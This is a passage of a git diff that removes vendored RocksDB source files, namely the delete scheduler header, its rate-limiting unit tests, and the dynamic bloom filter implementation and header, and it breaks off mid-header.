-  // Return delete rate limit in bytes per second
-  int64_t GetRateBytesPerSecond() { return rate_bytes_per_sec_.load(); }
-
-  // Set delete rate limit in bytes per second
-  void SetRateBytesPerSecond(int64_t bytes_per_sec) {
-    return rate_bytes_per_sec_.store(bytes_per_sec);
-  }
-
-  // Move file to trash directory and schedule it's deletion
-  Status DeleteFile(const std::string& fname);
-
-  // Wait for all files being deleteing in the background to finish or for
-  // destructor to be called.
-  void WaitForEmptyTrash();
-
-  // Return a map containing errors that happened in BackgroundEmptyTrash
-  // file_path => error status
-  std::map<std::string, Status> GetBackgroundErrors();
-
-  uint64_t GetTotalTrashSize() { return total_trash_size_.load(); }
-
-  void TEST_SetMaxTrashDBRatio(double r) {
-    assert(r >= 0);
-    max_trash_db_ratio_ = r;
-  }
-
- private:
-  Status MoveToTrash(const std::string& file_path, std::string* path_in_trash);
-
-  Status DeleteTrashFile(const std::string& path_in_trash,
-                         uint64_t* deleted_bytes);
-
-  void BackgroundEmptyTrash();
-
-  Env* env_;
-  // Path to the trash directory
-  std::string trash_dir_;
-  // total size of trash directory
-  std::atomic<uint64_t> total_trash_size_;
-  // Maximum number of bytes that should be deleted per second
-  std::atomic<int64_t> rate_bytes_per_sec_;
-  // Mutex to protect queue_, pending_files_, bg_errors_, closing_
-  InstrumentedMutex mu_;
-  // Queue of files in trash that need to be deleted
-  std::queue<std::string> queue_;
-  // Number of files in trash that are waiting to be deleted
-  int32_t pending_files_;
-  // Errors that happened in BackgroundEmptyTrash (file_path => error)
-  std::map<std::string, Status> bg_errors_;
-  // Set to true in ~DeleteScheduler() to force BackgroundEmptyTrash to stop
-  bool closing_;
-  // Condition variable signaled in these conditions
-  //    - pending_files_ value change from 0 => 1
-  //    - pending_files_ value change from 1 => 0
-  //    - closing_ value is set to true
-  InstrumentedCondVar cv_;
-  // Background thread running BackgroundEmptyTrash
-  std::unique_ptr<port::Thread> bg_thread_;
-  // Mutex to protect threads from file name conflicts
-  InstrumentedMutex file_move_mu_;
-  Logger* info_log_;
-  SstFileManagerImpl* sst_file_manager_;
-  // If the trash size constitutes for more than 25% of the total DB size
-  // we will start deleting new files passed to DeleteScheduler immediately
-  double max_trash_db_ratio_ = 0.25;
-  static const uint64_t kMicrosInSecond = 1000 * 1000LL;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/delete_scheduler_test.cc b/thirdparty/rocksdb/util/delete_scheduler_test.cc
deleted file mode 100644
index 208bdd7..0000000
--- a/thirdparty/rocksdb/util/delete_scheduler_test.cc
+++ /dev/null
@@ -1,563 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <atomic>
-#include <thread>
-#include <vector>
-
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "util/delete_scheduler.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifndef ROCKSDB_LITE
-
-namespace rocksdb {
-
-class DeleteSchedulerTest : public testing::Test {
- public:
-  DeleteSchedulerTest() : env_(Env::Default()) {
-    dummy_files_dir_ = test::TmpDir(env_) + "/delete_scheduler_dummy_data_dir";
-    DestroyAndCreateDir(dummy_files_dir_);
-    trash_dir_ = test::TmpDir(env_) + "/delete_scheduler_trash";
-    DestroyAndCreateDir(trash_dir_);
-  }
-
-  ~DeleteSchedulerTest() {
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->LoadDependency({});
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-    test::DestroyDir(env_, dummy_files_dir_);
-  }
-
-  void DestroyAndCreateDir(const std::string& dir) {
-    ASSERT_OK(test::DestroyDir(env_, dir));
-    EXPECT_OK(env_->CreateDir(dir));
-  }
-
-  int CountFilesInDir(const std::string& dir) {
-    std::vector<std::string> files_in_dir;
-    EXPECT_OK(env_->GetChildren(dir, &files_in_dir));
-    // Ignore "." and ".."
-    return static_cast<int>(files_in_dir.size()) - 2;
-  }
-
-  std::string NewDummyFile(const std::string& file_name, uint64_t size = 1024) {
-    std::string file_path = dummy_files_dir_ + "/" + file_name;
-    std::unique_ptr<WritableFile> f;
-    env_->NewWritableFile(file_path, &f, EnvOptions());
-    std::string data(size, 'A');
-    EXPECT_OK(f->Append(data));
-    EXPECT_OK(f->Close());
-    sst_file_mgr_->OnAddFile(file_path);
-    return file_path;
-  }
-
-  void NewDeleteScheduler() {
-    ASSERT_OK(env_->CreateDirIfMissing(trash_dir_));
-    sst_file_mgr_.reset(
-        new SstFileManagerImpl(env_, nullptr, trash_dir_, rate_bytes_per_sec_));
-    delete_scheduler_ = sst_file_mgr_->delete_scheduler();
-    // Tests in this file are for DeleteScheduler component and dont create any
-    // DBs, so we need to use set this value to 100% (instead of default 25%)
-    delete_scheduler_->TEST_SetMaxTrashDBRatio(1.1);
-  }
-
-  Env* env_;
-  std::string dummy_files_dir_;
-  std::string trash_dir_;
-  int64_t rate_bytes_per_sec_;
-  DeleteScheduler* delete_scheduler_;
-  std::unique_ptr<SstFileManagerImpl> sst_file_mgr_;
-};
-
-// Test the basic functionality of DeleteScheduler (Rate Limiting).
-// 1- Create 100 dummy files
-// 2- Delete the 100 dummy files using DeleteScheduler
-// --- Hold DeleteScheduler::BackgroundEmptyTrash ---
-// 3- Wait for DeleteScheduler to delete all files in trash
-// 4- Verify that BackgroundEmptyTrash used to correct penlties for the files
-// 5- Make sure that all created files were completely deleted
-TEST_F(DeleteSchedulerTest, BasicRateLimiting) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::BasicRateLimiting:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-
-  std::vector<uint64_t> penalties;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::BackgroundEmptyTrash:Wait",
-      [&](void* arg) { penalties.push_back(*(static_cast<uint64_t*>(arg))); });
-
-  int num_files = 100;  // 100 files
-  uint64_t file_size = 1024;  // every file is 1 kb
-  std::vector<uint64_t> delete_kbs_per_sec = {512, 200, 100, 50, 25};
-
-  for (size_t t = 0; t < delete_kbs_per_sec.size(); t++) {
-    penalties.clear();
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    DestroyAndCreateDir(dummy_files_dir_);
-    rate_bytes_per_sec_ = delete_kbs_per_sec[t] * 1024;
-    NewDeleteScheduler();
-
-    // Create 100 dummy files, every file is 1 Kb
-    std::vector<std::string> generated_files;
-    for (int i = 0; i < num_files; i++) {
-      std::string file_name = "file" + ToString(i) + ".data";
-      generated_files.push_back(NewDummyFile(file_name, file_size));
-    }
-
-    // Delete dummy files and measure time spent to empty trash
-    for (int i = 0; i < num_files; i++) {
-      ASSERT_OK(delete_scheduler_->DeleteFile(generated_files[i]));
-    }
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-
-    uint64_t delete_start_time = env_->NowMicros();
-    TEST_SYNC_POINT("DeleteSchedulerTest::BasicRateLimiting:1");
-    delete_scheduler_->WaitForEmptyTrash();
-    uint64_t time_spent_deleting = env_->NowMicros() - delete_start_time;
-
-    auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-    ASSERT_EQ(bg_errors.size(), 0);
-
-    uint64_t total_files_size = 0;
-    uint64_t expected_penlty = 0;
-    ASSERT_EQ(penalties.size(), num_files);
-    for (int i = 0; i < num_files; i++) {
-      total_files_size += file_size;
-      expected_penlty = ((total_files_size * 1000000) / rate_bytes_per_sec_);
-      ASSERT_EQ(expected_penlty, penalties[i]);
-    }
-    ASSERT_GT(time_spent_deleting, expected_penlty * 0.9);
-
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-// Same as the BasicRateLimiting test but delete files in multiple threads.
-// 1- Create 100 dummy files
-// 2- Delete the 100 dummy files using DeleteScheduler using 10 threads
-// --- Hold DeleteScheduler::BackgroundEmptyTrash ---
-// 3- Wait for DeleteScheduler to delete all files in queue
-// 4- Verify that BackgroundEmptyTrash used to correct penlties for the files
-// 5- Make sure that all created files were completely deleted
-TEST_F(DeleteSchedulerTest, RateLimitingMultiThreaded) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::RateLimitingMultiThreaded:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-
-  std::vector<uint64_t> penalties;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::BackgroundEmptyTrash:Wait",
-      [&](void* arg) { penalties.push_back(*(static_cast<uint64_t*>(arg))); });
-
-  int thread_cnt = 10;
-  int num_files = 10;  // 10 files per thread
-  uint64_t file_size = 1024;  // every file is 1 kb
-
-  std::vector<uint64_t> delete_kbs_per_sec = {512, 200, 100, 50, 25};
-  for (size_t t = 0; t < delete_kbs_per_sec.size(); t++) {
-    penalties.clear();
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    DestroyAndCreateDir(dummy_files_dir_);
-    rate_bytes_per_sec_ = delete_kbs_per_sec[t] * 1024;
-    NewDeleteScheduler();
-
-    // Create 100 dummy files, every file is 1 Kb
-    std::vector<std::string> generated_files;
-    for (int i = 0; i < num_files * thread_cnt; i++) {
-      std::string file_name = "file" + ToString(i) + ".data";
-      generated_files.push_back(NewDummyFile(file_name, file_size));
-    }
-
-    // Delete dummy files using 10 threads and measure time spent to empty trash
-    std::atomic<int> thread_num(0);
-    std::vector<port::Thread> threads;
-    std::function<void()> delete_thread = [&]() {
-      int idx = thread_num.fetch_add(1);
-      int range_start = idx * num_files;
-      int range_end = range_start + num_files;
-      for (int j = range_start; j < range_end; j++) {
-        ASSERT_OK(delete_scheduler_->DeleteFile(generated_files[j]));
-      }
-    };
-
-    for (int i = 0; i < thread_cnt; i++) {
-      threads.emplace_back(delete_thread);
-    }
-
-    for (size_t i = 0; i < threads.size(); i++) {
-      threads[i].join();
-    }
-
-    uint64_t delete_start_time = env_->NowMicros();
-    TEST_SYNC_POINT("DeleteSchedulerTest::RateLimitingMultiThreaded:1");
-    delete_scheduler_->WaitForEmptyTrash();
-    uint64_t time_spent_deleting = env_->NowMicros() - delete_start_time;
-
-    auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-    ASSERT_EQ(bg_errors.size(), 0);
-
-    uint64_t total_files_size = 0;
-    uint64_t expected_penlty = 0;
-    ASSERT_EQ(penalties.size(), num_files * thread_cnt);
-    for (int i = 0; i < num_files * thread_cnt; i++) {
-      total_files_size += file_size;
-      expected_penlty = ((total_files_size * 1000000) / rate_bytes_per_sec_);
-      ASSERT_EQ(expected_penlty, penalties[i]);
-    }
-    ASSERT_GT(time_spent_deleting, expected_penlty * 0.9);
-
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-// Disable rate limiting by setting rate_bytes_per_sec_ to 0 and make sure
-// that when DeleteScheduler delete a file it delete it immediately and dont
-// move it to trash
-TEST_F(DeleteSchedulerTest, DisableRateLimiting) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 0;
-  NewDeleteScheduler();
-
-  for (int i = 0; i < 10; i++) {
-    // Every file we delete will be deleted immediately
-    std::string dummy_file = NewDummyFile("dummy.data");
-    ASSERT_OK(delete_scheduler_->DeleteFile(dummy_file));
-    ASSERT_TRUE(env_->FileExists(dummy_file).IsNotFound());
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-  }
-
-  ASSERT_EQ(bg_delete_file, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// Testing that moving files to trash with the same name is not a problem
-// 1- Create 10 files with the same name "conflict.data"
-// 2- Delete the 10 files using DeleteScheduler
-// 3- Make sure that trash directory contain 10 files ("conflict.data" x 10)
-// --- Hold DeleteScheduler::BackgroundEmptyTrash ---
-// 4- Make sure that files are deleted from trash
-TEST_F(DeleteSchedulerTest, ConflictNames) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::ConflictNames:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1024 * 1024;  // 1 Mb/sec
-  NewDeleteScheduler();
-
-  // Create "conflict.data" and move it to trash 10 times
-  for (int i = 0; i < 10; i++) {
-    std::string dummy_file = NewDummyFile("conflict.data");
-    ASSERT_OK(delete_scheduler_->DeleteFile(dummy_file));
-  }
-  ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-  // 10 files ("conflict.data" x 10) in trash
-  ASSERT_EQ(CountFilesInDir(trash_dir_), 10);
-
-  // Hold BackgroundEmptyTrash
-  TEST_SYNC_POINT("DeleteSchedulerTest::ConflictNames:1");
-  delete_scheduler_->WaitForEmptyTrash();
-  ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-
-  auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-  ASSERT_EQ(bg_errors.size(), 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// 1- Create 10 dummy files
-// 2- Delete the 10 files using DeleteScheduler (move them to trsah)
-// 3- Delete the 10 files directly (using env_->DeleteFile)
-// --- Hold DeleteScheduler::BackgroundEmptyTrash ---
-// 4- Make sure that DeleteScheduler failed to delete the 10 files and
-//    reported 10 background errors
-TEST_F(DeleteSchedulerTest, BackgroundError) {
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::BackgroundError:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1024 * 1024;  // 1 Mb/sec
-  NewDeleteScheduler();
-
-  // Generate 10 dummy files and move them to trash
-  for (int i = 0; i < 10; i++) {
-    std::string file_name = "data_" + ToString(i) + ".data";
-    ASSERT_OK(delete_scheduler_->DeleteFile(NewDummyFile(file_name)));
-  }
-  ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-  ASSERT_EQ(CountFilesInDir(trash_dir_), 10);
-
-  // Delete 10 files from trash, this will cause background errors in
-  // BackgroundEmptyTrash since we already deleted the files it was
-  // goind to delete
-  for (int i = 0; i < 10; i++) {
-    std::string file_name = "data_" + ToString(i) + ".data";
-    ASSERT_OK(env_->DeleteFile(trash_dir_ + "/" + file_name));
-  }
-
-  // Hold BackgroundEmptyTrash
-  TEST_SYNC_POINT("DeleteSchedulerTest::BackgroundError:1");
-  delete_scheduler_->WaitForEmptyTrash();
-  auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-  ASSERT_EQ(bg_errors.size(), 10);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// 1- Create 10 dummy files
-// 2- Delete 10 dummy files using DeleteScheduler
-// 3- Wait for DeleteScheduler to delete all files in queue
-// 4- Make sure all files in trash directory were deleted
-// 5- Repeat previous steps 5 times
-TEST_F(DeleteSchedulerTest, StartBGEmptyTrashMultipleTimes) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1024 * 1024;  // 1 MB / sec
-  NewDeleteScheduler();
-
-  // Move files to trash, wait for empty trash, start again
-  for (int run = 1; run <= 5; run++) {
-    // Generate 10 dummy files and move them to trash
-    for (int i = 0; i < 10; i++) {
-      std::string file_name = "data_" + ToString(i) + ".data";
-      ASSERT_OK(delete_scheduler_->DeleteFile(NewDummyFile(file_name)));
-    }
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-    delete_scheduler_->WaitForEmptyTrash();
-    ASSERT_EQ(bg_delete_file, 10 * run);
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-
-    auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-    ASSERT_EQ(bg_errors.size(), 0);
-  }
-
-  ASSERT_EQ(bg_delete_file, 50);
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-}
-
-// 1- Create a DeleteScheduler with very slow rate limit (1 Byte / sec)
-// 2- Delete 100 files using DeleteScheduler
-// 3- Delete the DeleteScheduler (call the destructor while queue is not empty)
-// 4- Make sure that not all files were deleted from trash and that
-//    DeleteScheduler background thread did not delete all files
-TEST_F(DeleteSchedulerTest, DestructorWithNonEmptyQueue) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1;  // 1 Byte / sec
-  NewDeleteScheduler();
-
-  for (int i = 0; i < 100; i++) {
-    std::string file_name = "data_" + ToString(i) + ".data";
-    ASSERT_OK(delete_scheduler_->DeleteFile(NewDummyFile(file_name)));
-  }
-
-  // Deleting 100 files will need >28 hours to delete
-  // we will delete the DeleteScheduler while delete queue is not empty
-  sst_file_mgr_.reset();
-
-  ASSERT_LT(bg_delete_file, 100);
-  ASSERT_GT(CountFilesInDir(trash_dir_), 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-// 1- Delete the trash directory
-// 2- Delete 10 files using DeleteScheduler
-// 3- Make sure that the 10 files were deleted immediately since DeleteScheduler
-//    failed to move them to trash directory
-TEST_F(DeleteSchedulerTest, MoveToTrashError) {
-  int bg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 1024;  // 1 Kb / sec
-  NewDeleteScheduler();
-
-  // We will delete the trash directory, that mean that DeleteScheduler wont
-  // be able to move files to trash and will delete files them immediately.
-  ASSERT_OK(test::DestroyDir(env_, trash_dir_));
-  for (int i = 0; i < 10; i++) {
-    std::string file_name = "data_" + ToString(i) + ".data";
-    ASSERT_OK(delete_scheduler_->DeleteFile(NewDummyFile(file_name)));
-  }
-
-  ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-  ASSERT_EQ(bg_delete_file, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(DeleteSchedulerTest, DISABLED_DynamicRateLimiting1) {
-  std::vector<uint64_t> penalties;
-  int bg_delete_file = 0;
-  int fg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteFile",
-      [&](void* arg) { fg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::BackgroundEmptyTrash:Wait",
-      [&](void* arg) { penalties.push_back(*(static_cast<int*>(arg))); });
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"DeleteSchedulerTest::DynamicRateLimiting1:1",
-       "DeleteScheduler::BackgroundEmptyTrash"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rate_bytes_per_sec_ = 0;  // Disable rate limiting initially
-  NewDeleteScheduler();
-
-
-  int num_files = 10;  // 10 files
-  uint64_t file_size = 1024;  // every file is 1 kb
-
-  std::vector<int64_t> delete_kbs_per_sec = {512, 200, 0, 100, 50, -2, 25};
-  for (size_t t = 0; t < delete_kbs_per_sec.size(); t++) {
-    penalties.clear();
-    bg_delete_file = 0;
-    fg_delete_file = 0;
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-    DestroyAndCreateDir(dummy_files_dir_);
-    rate_bytes_per_sec_ = delete_kbs_per_sec[t] * 1024;
-    delete_scheduler_->SetRateBytesPerSecond(rate_bytes_per_sec_);
-
-    // Create 100 dummy files, every file is 1 Kb
-    std::vector<std::string> generated_files;
-    for (int i = 0; i < num_files; i++) {
-      std::string file_name = "file" + ToString(i) + ".data";
-      generated_files.push_back(NewDummyFile(file_name, file_size));
-    }
-
-    // Delete dummy files and measure time spent to empty trash
-    for (int i = 0; i < num_files; i++) {
-      ASSERT_OK(delete_scheduler_->DeleteFile(generated_files[i]));
-    }
-    ASSERT_EQ(CountFilesInDir(dummy_files_dir_), 0);
-
-    if (rate_bytes_per_sec_ > 0) {
-      uint64_t delete_start_time = env_->NowMicros();
-      TEST_SYNC_POINT("DeleteSchedulerTest::DynamicRateLimiting1:1");
-      delete_scheduler_->WaitForEmptyTrash();
-      uint64_t time_spent_deleting = env_->NowMicros() - delete_start_time;
-
-      auto bg_errors = delete_scheduler_->GetBackgroundErrors();
-      ASSERT_EQ(bg_errors.size(), 0);
-
-      uint64_t total_files_size = 0;
-      uint64_t expected_penlty = 0;
-      ASSERT_EQ(penalties.size(), num_files);
-      for (int i = 0; i < num_files; i++) {
-        total_files_size += file_size;
-        expected_penlty = ((total_files_size * 1000000) / rate_bytes_per_sec_);
-        ASSERT_EQ(expected_penlty, penalties[i]);
-      }
-      ASSERT_GT(time_spent_deleting, expected_penlty * 0.9);
-      ASSERT_EQ(bg_delete_file, num_files);
-      ASSERT_EQ(fg_delete_file, 0);
-    } else {
-      ASSERT_EQ(penalties.size(), 0);
-      ASSERT_EQ(bg_delete_file, 0);
-      ASSERT_EQ(fg_delete_file, num_files);
-    }
-
-    ASSERT_EQ(CountFilesInDir(trash_dir_), 0);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-}
-
-TEST_F(DeleteSchedulerTest, ImmediateDeleteOn25PercDBSize) {
-  int bg_delete_file = 0;
-  int fg_delete_file = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteTrashFile:DeleteFile",
-      [&](void* arg) { bg_delete_file++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DeleteScheduler::DeleteFile", [&](void* arg) { fg_delete_file++; });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  int num_files = 100;  // 100 files
-  uint64_t file_size = 1024 * 10; // 100 KB as a file size
-  rate_bytes_per_sec_ = 1;  // 1 byte per sec (very slow trash delete)
-
-  NewDeleteScheduler();
-  delete_scheduler_->TEST_SetMaxTrashDBRatio(0.25);
-
-  std::vector<std::string> generated_files;
-  for (int i = 0; i < num_files; i++) {
-    std::string file_name = "file" + ToString(i) + ".data";
-    generated_files.push_back(NewDummyFile(file_name, file_size));
-  }
-
-  for (std::string& file_name : generated_files) {
-    delete_scheduler_->DeleteFile(file_name);
-  }
-
-  // When we end up with 26 files in trash we will start
-  // deleting new files immediately
-  ASSERT_EQ(fg_delete_file, 74);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-int main(int argc, char** argv) {
-  printf("DeleteScheduler is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/dynamic_bloom.cc b/thirdparty/rocksdb/util/dynamic_bloom.cc
deleted file mode 100644
index 7c296cb..0000000
--- a/thirdparty/rocksdb/util/dynamic_bloom.cc
+++ /dev/null
@@ -1,82 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "dynamic_bloom.h"
-
-#include <algorithm>
-
-#include "port/port.h"
-#include "rocksdb/slice.h"
-#include "util/allocator.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-namespace {
-
-uint32_t GetTotalBitsForLocality(uint32_t total_bits) {
-  uint32_t num_blocks =
-      (total_bits + CACHE_LINE_SIZE * 8 - 1) / (CACHE_LINE_SIZE * 8);
-
-  // Make num_blocks an odd number to make sure more bits are involved
-  // when determining which block.
-  if (num_blocks % 2 == 0) {
-    num_blocks++;
-  }
-
-  return num_blocks * (CACHE_LINE_SIZE * 8);
-}
-}
-
-DynamicBloom::DynamicBloom(Allocator* allocator, uint32_t total_bits,
-                           uint32_t locality, uint32_t num_probes,
-                           uint32_t (*hash_func)(const Slice& key),
-                           size_t huge_page_tlb_size,
-                           Logger* logger)
-    : DynamicBloom(num_probes, hash_func) {
-  SetTotalBits(allocator, total_bits, locality, huge_page_tlb_size, logger);
-}
-
-DynamicBloom::DynamicBloom(uint32_t num_probes,
-                           uint32_t (*hash_func)(const Slice& key))
-    : kTotalBits(0),
-      kNumBlocks(0),
-      kNumProbes(num_probes),
-      hash_func_(hash_func == nullptr ? &BloomHash : hash_func) {}
-
-void DynamicBloom::SetRawData(unsigned char* raw_data, uint32_t total_bits,
-                              uint32_t num_blocks) {
-  data_ = reinterpret_cast<std::atomic<uint8_t>*>(raw_data);
-  kTotalBits = total_bits;
-  kNumBlocks = num_blocks;
-}
-
-void DynamicBloom::SetTotalBits(Allocator* allocator,
-                                uint32_t total_bits, uint32_t locality,
-                                size_t huge_page_tlb_size,
-                                Logger* logger) {
-  kTotalBits = (locality > 0) ? GetTotalBitsForLocality(total_bits)
-                              : (total_bits + 7) / 8 * 8;
-  kNumBlocks = (locality > 0) ? (kTotalBits / (CACHE_LINE_SIZE * 8)) : 0;
-
-  assert(kNumBlocks > 0 || kTotalBits > 0);
-  assert(kNumProbes > 0);
-
-  uint32_t sz = kTotalBits / 8;
-  if (kNumBlocks > 0) {
-    sz += CACHE_LINE_SIZE - 1;
-  }
-  assert(allocator);
-
-  char* raw = allocator->AllocateAligned(sz, huge_page_tlb_size, logger);
-  memset(raw, 0, sz);
-  auto cache_line_offset = reinterpret_cast<uintptr_t>(raw) % CACHE_LINE_SIZE;
-  if (kNumBlocks > 0 && cache_line_offset > 0) {
-    raw += CACHE_LINE_SIZE - cache_line_offset;
-  }
-  data_ = reinterpret_cast<std::atomic<uint8_t>*>(raw);
-}
-
-}  // rocksdb
diff --git a/thirdparty/rocksdb/util/dynamic_bloom.h b/thirdparty/rocksdb/util/dynamic_bloom.h
deleted file mode 100644
index 17325dd..0000000
--- a/thirdparty/rocksdb/util/dynamic_bloom.h
+++ /dev/null
@@ -1,191 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-
-#include "rocksdb/slice.h"
-
-#include "port/port.h"
-
-#include <atomic>
-#include <memory>
-
-namespace rocksdb {
-
-class Slice;
-class Allocator;
-class Logger;
-
-class DynamicBloom {
- public:
-  // allocator: pass allocator to bloom filter, hence trace the usage of memory
-  // total_bits: fixed total bits for the bloom
-  // num_probes: number of hash probes for a single key
-  // locality:  If positive, optimize for cache line locality, 0 otherwise.
-  // hash_func:  customized hash function
-  // huge_page_tlb_size:  if >0, try to allocate bloom bytes from huge page TLB
-  //                      within this page size. Need to reserve huge pages for
-  //                      it to be allocated, like:
-  //                         sysctl -w vm.nr_hugepages=20
-  //                     See linux doc Documentation/vm/hugetlbpage.txt
-  explicit DynamicBloom(Allocator* allocator,
-                        uint32_t total_bits, uint32_t locality = 0,
-                        uint32_t num_probes = 6,
-                        uint32_t (*hash_func)(const Slice& key) = nullptr,
-                        size_t huge_page_tlb_size = 0,
-                        Logger* logger = nullptr);
-
-  explicit DynamicBloom(uint32_t num_probes = 6,
-                        uint32_t (*hash_func)(const Slice& key) = nullptr);
-
-  void SetTotalBits(Allocator* allocator, uint32_t total_bits,
-                    uint32_t locality, size_t huge_page_tlb_size,
-                    Logger* logger);
-
-  ~DynamicBloom() {}
-
-  // Assuming single threaded access to this function.
-  void Add(const Slice& key);
-
-  // Like Add, but may be called concurrent with other functions.
-  void AddConcurrently(const Slice& key);
-
-  // Assuming single threaded access to this function.
-  void AddHash(uint32_t hash);
-
-  // Like AddHash, but may be called concurrent with other functions.
-  void AddHashConcurrently(uint32_t hash);
-
-  // Multithreaded access to this function is OK
-  bool MayContain(const Slice& key) const;
-
-  // Multithreaded access to this function is OK
-  bool MayContainHash(uint32_t hash) const;
-
-  void Prefetch(uint32_t h);
-
-  uint32_t GetNumBlocks() const { return kNumBlocks; }
-
-  Slice GetRawData() const {
